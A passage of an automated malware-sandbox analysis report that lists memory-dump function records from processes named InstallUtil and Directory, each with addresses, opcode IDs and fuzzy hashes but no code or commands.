                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0289C25E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4591607842.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2890000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 6fb0a17e4d6a4565f8d5defdd3d6b6b4fd2586e3912f77c04ad512f2fc0bca42
                                                          • Instruction ID: 494b83f6337981813435be79f6b3dd341d4dfc7a262c736ec0d1035b443dcdb3
                                                          • Opcode Fuzzy Hash: 6fb0a17e4d6a4565f8d5defdd3d6b6b4fd2586e3912f77c04ad512f2fc0bca42
                                                          • Instruction Fuzzy Hash: AB110FBAC002498FDB10CF9AC544B9EFBF4EB88724F14845AD829A7200C3B9A545CFA5
                                                          Function 00F0D4D8 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4591110138.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_f0d000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e876bab600d35310697b49baa418351e1c3b42ced6d4db4b46b97d973f676a4d
                                                          • Instruction ID: 17c5d6b81b14c7bf7fc1a976ba7a5c830352ab611043d3a5dbdea15ba8ce1e8a
                                                          • Opcode Fuzzy Hash: e876bab600d35310697b49baa418351e1c3b42ced6d4db4b46b97d973f676a4d
                                                          • Instruction Fuzzy Hash: 90212576504204DFDB04DF94DDC0B36BF65FB98328F28816DED090B296C336D856EAA2
                                                          Function 00F1D01C Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4591212160.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_f1d000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d9d6c90614895a6982896045d9c85316df898fd314a0685d3ab43ff58818054f
                                                          • Instruction ID: cf4636b5fefd0ebd961d5296228baac7704a8eaad9e48408b4514973e0ab79e6
                                                          • Opcode Fuzzy Hash: d9d6c90614895a6982896045d9c85316df898fd314a0685d3ab43ff58818054f
                                                          • Instruction Fuzzy Hash: 82212576504200EFCB14DF14D9C0B66BB71FB88324F20C56DD90A0B25AC37AD887DA61
                                                          Function 00F1D005 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4591212160.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_f1d000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b93b6202413b9f607769be172ee4caa413ce7c1d619734a7d3ce1a77a48a3830
                                                          • Instruction ID: ae2bfdfe5ae2bdf7e8ce800cf71254b4713b67ffd1e52c50bb062973c7654196
                                                          • Opcode Fuzzy Hash: b93b6202413b9f607769be172ee4caa413ce7c1d619734a7d3ce1a77a48a3830
                                                          • Instruction Fuzzy Hash: 1F2180755093C08FCB02CF24D990755BF71EB46314F28C5EAD8498B2A7C33A984ADB62
                                                          Function 00F0D4D3 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4591110138.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_f0d000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                          • Instruction ID: 86f597cea1ec8304f75d035486e9334d33ab9ad2261615b6f4beaadfac24399d
                                                          • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                          • Instruction Fuzzy Hash: EF11D376904280CFCB15CF54D9C4B26BF71FB94328F28C6A9DC090B256C33AD856DBA1

                                                          Executed Functions

                                                          Function 01000C50 Relevance: .1, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.4588943530.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1000000_Directory.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9d1c791b88a79d7abca91002d39b8b6f40d1b7b0247cdbe73f1e363ceef19982
                                                          • Instruction ID: 0eb88951af68c95e9cd18c8c56836f837a4fc84378e49ef41ed3a63c85b72a74
                                                          • Opcode Fuzzy Hash: 9d1c791b88a79d7abca91002d39b8b6f40d1b7b0247cdbe73f1e363ceef19982
                                                          • Instruction Fuzzy Hash: C2417E30A00619CFCB05EBACD444BADBBF2EF88714F15806AE455EB291DB35AD41CBB5
                                                          Function 01000DD9 Relevance: .1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.4588943530.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1000000_Directory.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f0f77d9d0ef5b7a4c99d94b00386cb1337fba3c62ac04f149c68cfde077a340c
                                                          • Instruction ID: 4dcf2a1a52444fcb219b3416a3c77d1ede5fc2982415fb869ae6c07a022e2935
                                                          • Opcode Fuzzy Hash: f0f77d9d0ef5b7a4c99d94b00386cb1337fba3c62ac04f149c68cfde077a340c
                                                          • Instruction Fuzzy Hash: 1431AD30A00614CFDB0AEBACD0447ADB7F2EF88354F0580AAE455AB2D5DB35AD41CBB5
                                                          Function 01000870 Relevance: .1, Instructions: 100COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.4588943530.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1000000_Directory.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 367d0839149aeac8ae96957061dd2d326398e716b4685b85f53ff1d79cac2e15
                                                          • Instruction ID: 3b99f0b675bffb1e5a11edd771fa91ecc23edc7f6011e20d78af9625d90e4603
                                                          • Opcode Fuzzy Hash: 367d0839149aeac8ae96957061dd2d326398e716b4685b85f53ff1d79cac2e15
                                                          • Instruction Fuzzy Hash: F931A431E0070ACFCB05DFA8D8446AEBBF1FF89310F158565E505EB291D770A945CBA1
                                                          Function 01000B19 Relevance: .1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.4588943530.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1000000_Directory.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 242874abede02fe68f925a2b7f10acf624fe6629e4f66e4a3b2a2741ad4fe960
                                                          • Instruction ID: 8984afdf4457799cb74202d6d98ffea33977c7e1d6b9438a63f1c0e631a0640f
                                                          • Opcode Fuzzy Hash: 242874abede02fe68f925a2b7f10acf624fe6629e4f66e4a3b2a2741ad4fe960
                                                          • Instruction Fuzzy Hash: 7531BF71B00608DFDB01DF68D840A9EFBF6EF89750F10816AE886A7355DB30AD45CBA0
                                                          Function 010015B4 Relevance: .1, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.4588943530.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1000000_Directory.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8b3973bfee94f8d182db5b6276a5fbbfbdb879af42ae5b2be7ad7d483987b28
                                                          • Instruction ID: 3df45ff5c4e3ea703a8cb8f17a4518da7cd0e2606340173fbaf6b8f2df2bc81e
                                                          • Opcode Fuzzy Hash: e8b3973bfee94f8d182db5b6276a5fbbfbdb879af42ae5b2be7ad7d483987b28
                                                          • Instruction Fuzzy Hash: 90316870D01248DFEF10CFAAD984ADEBFF5AF48310F248469E549AB290DB749945CFA0
                                                          Function 010015C0 Relevance: .1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.4588943530.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1000000_Directory.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f5c3cd59e62db75c28338424908299292eb3379aa2228a8f58b5f28ad8b6db50
                                                          • Instruction ID: 96de898b562fd2fd0b1f816d9a55c76febcbd1bf6aa1c5cd7950d8542670487a
                                                          • Opcode Fuzzy Hash: f5c3cd59e62db75c28338424908299292eb3379aa2228a8f58b5f28ad8b6db50
                                                          • Instruction Fuzzy Hash: 60314670D00248DFEF14CFAAD984ADEBFF5AF48310F248429E549AB290DB749944CF90
                                                          Function 00D2D5DC Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.4585687710.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_d2d000_Directory.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f825242086c0c6d765dcb932ecca0a0b95502589547f392910de63c923b332fa
                                                          • Instruction ID: b01a970ce421b6abb62bc48097414edc77087b526ca018079277de68f9ce2ad2
                                                          • Opcode Fuzzy Hash: f825242086c0c6d765dcb932ecca0a0b95502589547f392910de63c923b332fa
                                                          • Instruction Fuzzy Hash: 59210672504248DFDB04DF10E9C0B26BF67FBA8319F248169E9090B256C376D856CAB1
                                                          Function 01000A20 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.4588943530.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1000000_Directory.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7175625ba936c4995707bd3abfd01328ac5daf066462e49fdefc4c9cf346f3c9
                                                          • Instruction ID: 72a59b7d58a9fc1158c0d9dc61036e252a7fc15110c81a580642f34a066ef452
                                                          • Opcode Fuzzy Hash: 7175625ba936c4995707bd3abfd01328ac5daf066462e49fdefc4c9cf346f3c9
                                                          • Instruction Fuzzy Hash: 2521BE31A007198FDF25DF69C8046DEBBF1FF89350F104A6AE496E7295DB30A844CB60
                                                          Function 01000860 Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.4588943530.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1000000_Directory.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4fe10c5ab8749c2be1c497aa749896fc548b269ee8ffd94758806e673906aa24
                                                          • Instruction ID: 7f121423b0fc22ae27b118398266e403afdbdcb48d6b176427c781b2d1d0ac96
                                                          • Opcode Fuzzy Hash: 4fe10c5ab8749c2be1c497aa749896fc548b269ee8ffd94758806e673906aa24
                                                          • Instruction Fuzzy Hash: 6411F374A00209CFDB45DF68C448A6EBBF2FF48300F5584A9E945DB2A5D735A941CFA0
                                                          Function 01000CEA Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.4588943530.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1000000_Directory.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 531070b28a6b670e5c43c82d1a883589a0221282391e95ebe35b579e613b2c5c
                                                          • Instruction ID: 7917c65f7464d28a020caae20eeeeef400222cf250959d23c54d4b4d8972a462
                                                          • Opcode Fuzzy Hash: 531070b28a6b670e5c43c82d1a883589a0221282391e95ebe35b579e613b2c5c
                                                          • Instruction Fuzzy Hash: 6D211830A00618CFDB15EB99D180B9CF7F2EB48314F45C0AAE458AB295D775E880CFA4
                                                          Function 00D2D5D7 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.4585687710.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_d2d000_Directory.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                          • Instruction ID: 5a6ff398446c982b939961a1fce2a893bcbab83b4354d40454a2dbb8a53ce5c7
                                                          • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                          • Instruction Fuzzy Hash: 6811E676504284CFCF05CF10D5C4B16BF72FB94318F28C6A9D8494B256C33AD85ACBA2
                                                          Function 01000A0F Relevance: .1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.4588943530.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1000000_Directory.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7d6971766a1e8717b4a0bb11e495a70a50fc0d5beafe9f6c7a8c470448bdffab
                                                          • Instruction ID: b6500ab5ac83413befa8ce114908c9e53e2e235c989a128fde96c8135dd6d604
                                                          • Opcode Fuzzy Hash: 7d6971766a1e8717b4a0bb11e495a70a50fc0d5beafe9f6c7a8c470448bdffab
                                                          • Instruction Fuzzy Hash: 6211A1319003189FDB55CF69C804ADEBBF5FF49350B0485A9E485E7255DB34AD48CFA0
                                                          Function 00D2D01D Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.4585687710.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_d2d000_Directory.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ff0a040491c1fb610133a7a729bbab6c01cb83f7fa522798e2671761031db1ef
                                                          • Instruction ID: 435fda398fee6385e06f220a737fb25f975059458ae138039c4d8e601bd50d60
                                                          • Opcode Fuzzy Hash: ff0a040491c1fb610133a7a729bbab6c01cb83f7fa522798e2671761031db1ef
                                                          • Instruction Fuzzy Hash: DB012B71404350DAE7204E25EE84B67BF99DF61368F1CC01AED484F2A2C7B9D841C6F1
                                                          Function 00D2D005 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.4585687710.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_d2d000_Directory.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e0d5f433fbbbf6c6625409e3a6e24292562c5429be1ebbfa82d383966cc19a51
                                                          • Instruction ID: 3a2e119ecfbd1255197e14a7a6be4e3e549971413e8f4b328ba84c3c9e203d74
                                                          • Opcode Fuzzy Hash: e0d5f433fbbbf6c6625409e3a6e24292562c5429be1ebbfa82d383966cc19a51
                                                          • Instruction Fuzzy Hash: F201406140E3D09EE7128B259994B52BFB49F53224F1DC1DBD988CF1E3C2695C49C772
                                                          Function 01000990 Relevance: .0, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.4588943530.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1000000_Directory.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 36d0922475747598850aeb73c3d86dd69d21ee567c5dcc754e07bf2554deb3f7
                                                          • Instruction ID: 9e425cfb436e3e8ce2048d251bbb19bf3e8d0765acb3cc2b7a7a326c50e44dab
                                                          • Opcode Fuzzy Hash: 36d0922475747598850aeb73c3d86dd69d21ee567c5dcc754e07bf2554deb3f7
                                                          • Instruction Fuzzy Hash: E401F432940209CBDB06DB70C855AEFBFB69F45310F05856AD402EB251DFB41906C792
                                                          Function 01000844 Relevance: .0, Instructions: 7COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.4588943530.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1000000_Directory.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d35384f1fc8229e47cf27153f6dff11ac939dc69b468e7bd185852b43af774d3
                                                          • Instruction ID: c813c8e257e9fa3df0752d28a18aaba424f9e1ff644f7a577d595e0ee440b8c3
                                                          • Opcode Fuzzy Hash: d35384f1fc8229e47cf27153f6dff11ac939dc69b468e7bd185852b43af774d3
                                                          • Instruction Fuzzy Hash: 49B012317017009F8F042BB5761C15C3621DBA13007C00C98D007CB395CD244908DF34